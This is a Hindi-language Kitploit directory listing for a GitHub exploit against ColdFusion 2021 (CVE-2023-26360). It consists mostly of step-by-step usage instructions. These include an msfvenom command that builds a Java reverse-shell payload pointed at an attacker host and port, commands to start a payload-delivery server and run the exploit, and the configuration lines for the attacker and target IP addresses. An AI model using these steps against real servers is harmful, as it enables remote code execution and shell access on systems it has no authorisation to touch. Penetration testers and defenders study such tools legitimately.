Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-26360-RCE — ColdFusion 2021 (CVE-2023-26360) में रिमोट कोड निष्पादन के लिए शोषण | Kitploit
उपकरण/GitHubGitHub/h3rm1tr3b0rn/cve-2023-26360-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubh3rm1tr3b0rn/cve-2023-26360-rce

CVE-2023-26360-RCE

ColdFusion 2021 (CVE-2023-26360) में रिमोट कोड निष्पादन के लिए शोषण

रिपॉजिटरी देखें
11310 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-26360 - ColdFusion 2021 पर रिमोट कोड निष्पादन

कभी-कभी, स्क्रिप्ट पहले प्रयास में काम नहीं करतीं। इसे काम करने के लिए कुछ बार प्रयास करें।

निष्पादन कैसे करें

msfvenom के साथ पेलोड बनाएँ

root@kitploit:~
msfvenom -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 > file.java

server.py प्रारंभ करना

  • यह सर्वर cve.2023-26360.py के साथ प्रारंभिक पहुँच के बाद Coldfusion सर्वर को पेलोड भेजेगा, इसलिए इसे पहले प्रारंभ करना आवश्यक है।
root@kitploit:~
python3 server.py 8000
  • आर्गुमेंट 8000 वह पोर्ट है जिस पर सर्वर सुनेंगा।

  • यह ध्यान देना महत्वपूर्ण है कि लाइन 12 सर्वर आईपी पता कॉन्फ़िगर करती है, इसलिए इसे बदलें:

  • root@kitploit:~
    s.bind(('192.168.56.1',port))
    

    cve-2023-26360.py चलाएँ

    • एक्सप्लॉइट चलाने के लिए, निष्पादित करें:
    root@kitploit:~
    python3 cve-2023-26360.py 8000
    
    • server.py की तरह, आर्गुमेंट 8000 वह पोर्ट है जिस पर server.py सुनेंगा। इसलिए, यह दोनों कमांड में समान होना चाहिए।

    • cve-2023-26360.py की लाइन 8 server.py के सुनने के लिए आईपी पता सेट करती है। इसे सही ढंग से कॉन्फ़िगर करना आवश्यक है।

    • cve-2023-26360.py की लाइन 11 coldfusion सर्वर का आईपी पता सेट करती है, इसलिए इसे बदलें:

    root@kitploit:~
    url = "http://192.168.56.102:8500"
    

    परीक्षण किया गया

    • ColdFusion 2021 - Windows Server 2019
    टूल डाउनलोड करें